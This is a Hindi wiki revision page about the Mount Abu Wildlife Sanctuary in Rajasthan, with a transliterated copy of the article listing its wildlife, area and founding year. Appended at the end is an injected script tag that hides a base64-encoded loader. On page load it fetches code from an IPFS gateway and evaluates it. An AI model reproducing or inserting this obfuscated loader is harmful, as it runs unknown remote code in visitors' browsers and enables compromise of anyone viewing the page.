Difference between revisions of "माउंट आबू वन्यजीव अभयारण्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[माउंट आबू]] [[राजस्थान]] का एकमात्र हिल स्टेशन है। माउंट आबू में अनेक पर्यटन स्थल हैं। इनमें कुछ शहर से दूर हैं तो कुछ शहर के आसपास ही हैं।
+
[[चित्र:Mount-Abu-Wildlife-Sanctuary.jpg|thumb|250px|माउंट आबू वन्यजीव अभयारण्य]]
 
+
'''माउंट आबू वन्यजीव अभयारण्य''' [[राजस्थान]] राज्य के [[माउंट आबू]] शहर में स्थित है। यह अभयारण्य मांउट आबू का प्रसिद्ध पर्यटक स्थल है।  
*यह अभयारण्य मांउट आबू का प्रसिद्ध पर्यटक स्थल है।  
+
*यहाँ मुख्य रूप से [[तेंदुआ|तेंदुए]], स्लोथबियर, वाइल्ड बोर, सांभर, चिंकारा और [[लंगूर]] पाए जाते हैं।  
*यहाँ मुख्य रूप से तेंदुए, स्लोथबियर, वाइल्ड बोर, सांभर, चिंकारा और [[लंगूर]] पाए जाते हैं।  
 
 
*288 वर्ग किलोमीटर में फैले इस अभयारण्य की स्थापना 1960 में की गई थी।  
 
*288 वर्ग किलोमीटर में फैले इस अभयारण्य की स्थापना 1960 में की गई थी।  
 
*यहाँ पक्षियों की लगभग 250 और पौधों की 110 से ज़्यादा प्रजातियां देखी जा सकती हैं।  
 
*यहाँ पक्षियों की लगभग 250 और पौधों की 110 से ज़्यादा प्रजातियां देखी जा सकती हैं।  
 
*पक्षियों में रुचि रखने वालों के लिए उपयुक्त जगह है।
 
*पक्षियों में रुचि रखने वालों के लिए उपयुक्त जगह है।
{{प्रचार}}
+
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 15: Line 14:
 
}}
 
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]

Revision as of 06:18, 14 June 2012

thumb|250px|mauant aboo vanyajiv abhayarany mauant aboo vanyajiv abhayarany rajasthan rajy ke mauant aboo shahar mean sthit hai. yah abhayarany maanut aboo ka prasiddh paryatak sthal hai.

  • yahaan mukhy roop se teandue, slothabiyar, vaild bor, saanbhar, chiankara aur langoor pae jate haian.
  • 288 varg kilomitar mean phaile is abhayarany ki sthapana 1960 mean ki gee thi.
  • yahaan pakshiyoan ki lagabhag 250 aur paudhoan ki 110 se zyada prajatiyaan dekhi ja sakati haian.
  • pakshiyoan mean ruchi rakhane valoan ke lie upayukt jagah hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>